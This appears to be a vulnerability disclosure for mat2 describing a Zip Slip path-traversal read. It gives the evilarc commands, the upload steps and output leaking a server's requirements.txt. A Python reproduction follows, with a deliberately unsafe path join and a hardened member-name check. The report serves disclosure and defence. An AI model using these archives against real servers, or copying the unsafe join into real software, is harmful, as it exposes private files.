
Arbitrary read via malicious zip file

[As received by email, sent by jfriedli]

Heyo

I found an issue in mat2. It is vulnerable to the Zip Slip vulnerability.

Here's a little summary :)

Create malicious file

Script used to create a Zip Slip file: https://github.com/ptoomey3/evilarc/blob/master/evilarc.py

python2.7 evilarc.py filename_to_extract.txt -d 0 -o "unix" -p "../../../home/kali/Documents/projects"

where filename_to_extract.txt is the filename of the file you want to extract from the victim system. Note: it has to be an extension supported by mat2.

mat2 evil.zip

and upon extracting the cleaned zip file you receive the file from the victim.

Example Extracting Requirements.txt From Webserver

Create the empty target file we want to extract:

touch requirements.txt

We know the absolute path of the target file on the server from the Dockerfile.

python2.7 path_tra.py requirements.txt -d 0 -o "unix" -p "../../../var/www/mat2-web/"
Creating evil.zip containing ../../../var/www/mat2-web/requirements.txt

Check if the path and filename are correct.

cat evilzip
PK�m�T*../../../var/www/mat2-web/requirements.txtPK�m�T*�t2-web/requirements.txtPKXH

Then upload the file via the web interface and download the cleaned zip.

Afterward we unzip it.

unzip evil.cleaned.zip
Archive:  evil.cleaned.zip
warning:  skipped "../" path component(s) in ../../../var/www/mat2-web/requirements.txt
 extracting: var/www/mat2-web/requirements.txt

And we can prove that we received the content of requirements.txt from the server.

cat var/www/mat2-web/requirements.txt
mutagen==1.45.1
ffmpeg==1.4
bubblewrap==1.2.0
mat2==0.12.4
flask==2.1.2
Flask-RESTful==0.3.9
Flask-Cors==3.0.10
Cerberus==1.3.4
Flask-Testing==0.8.1
blinker==1.4
flasgger==0.9.5
Flask-Assets==2.0
Edited by jvoisin
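The following is an added example (not code from the report above, and not mat2's own source) that reproduces the mechanism the report describes end to end in temporary directories: it builds an archive whose single member is named ../../../var/www/mat2-web/requirements.txt (what the evilarc invocation above produces), shows that Python's ZipFile.extract() strips the ../ components exactly as the unzip warning on the page does, and then shows that a handler which separately joins the untrusted member name onto its extraction directory ends up opening the real file on the host. The naive join is a simplified stand-in for that pattern, not a quote of mat2's code. is_member_safe() is the kind of check an archive handler needs before touching a member name; the victim file, directory layout and payload are constructed here so the script runs offline.

```python
"""Zip Slip reproduction: traversal member name vs. a hardened member check.

Added example; the unsafe join is an illustrative stand-in, not mat2's code.
"""
import io
import os
import pathlib
import shutil
import tempfile
import zipfile


def build_evil_zip(target: str, depth: int = 3, payload: bytes = b"") -> bytes:
    """Return a zip whose only member is named '../' * depth + target.

    This is what `evilarc.py <target> -d <depth> -o unix -p <prefix>` does;
    the member body is empty because only the name matters for the attack.
    """
    member = "../" * depth + target.lstrip("/")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(member, payload)
    return buf.getvalue()


def naive_member_path(extract_dir: str, member: str) -> str:
    """UNSAFE: trusts the member name, so '../' walks out of extract_dir."""
    return os.path.normpath(os.path.join(extract_dir, member))


def is_member_safe(extract_dir: str, member: str) -> bool:
    """Reject absolute names, any '..' component, and anything that does not
    resolve to a location underneath extract_dir."""
    if member.startswith(("/", "\\")) or os.path.isabs(member):
        return False
    if ".." in pathlib.PurePosixPath(member).parts:
        return False
    base = os.path.realpath(extract_dir)
    resolved = os.path.realpath(os.path.join(base, member))
    return os.path.commonpath([base, resolved]) == base


def demo() -> dict:
    """Play the scenario out in a scratch tree and report what happened."""
    root = tempfile.mkdtemp()
    try:
        # Constructed victim file, standing in for /var/www/mat2-web/requirements.txt.
        victim = os.path.join(root, "var", "www", "mat2-web", "requirements.txt")
        os.makedirs(os.path.dirname(victim))
        secret = b"mutagen==1.45.1\nmat2==0.12.4\n"
        with open(victim, "wb") as fh:
            fh.write(secret)

        # Extraction directory three levels below root, matching depth=3.
        extract_dir = os.path.join(root, "a", "b", "tmp")
        os.makedirs(extract_dir)

        evil = build_evil_zip("var/www/mat2-web/requirements.txt", depth=3)
        with zipfile.ZipFile(io.BytesIO(evil)) as zf:
            member = zf.namelist()[0]
            # ZipFile.extract() drops the '..' parts: the (empty) member lands
            # inside extract_dir, just like unzip's "skipped ../" warning.
            extracted_to = zf.extract(member, extract_dir)

        # A handler that then rebuilds the path from the raw member name
        # opens the victim's real file instead of the extracted copy.
        naive = naive_member_path(extract_dir, member)
        with open(naive, "rb") as fh:
            leaked = fh.read()

        return {
            "member": member,
            "extracted_inside": extracted_to.startswith(extract_dir + os.sep),
            "naive_escapes": not naive.startswith(extract_dir + os.sep),
            "leaked": leaked,
            "rejected": not is_member_safe(extract_dir, member),
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    result = demo()
    print("member name:      ", result["member"])
    print("zipfile extracted inside dir:", result["extracted_inside"])
    print("naive join escaped dir:      ", result["naive_escapes"])
    print("bytes read via naive path:   ", result["leaked"])
    print("hardened check rejected it:  ", result["rejected"])
```

The check is applied to the member name before any path is built from it; resolving with realpath() and comparing against the base directory also catches symlinked extraction directories, which a plain string-prefix test would not.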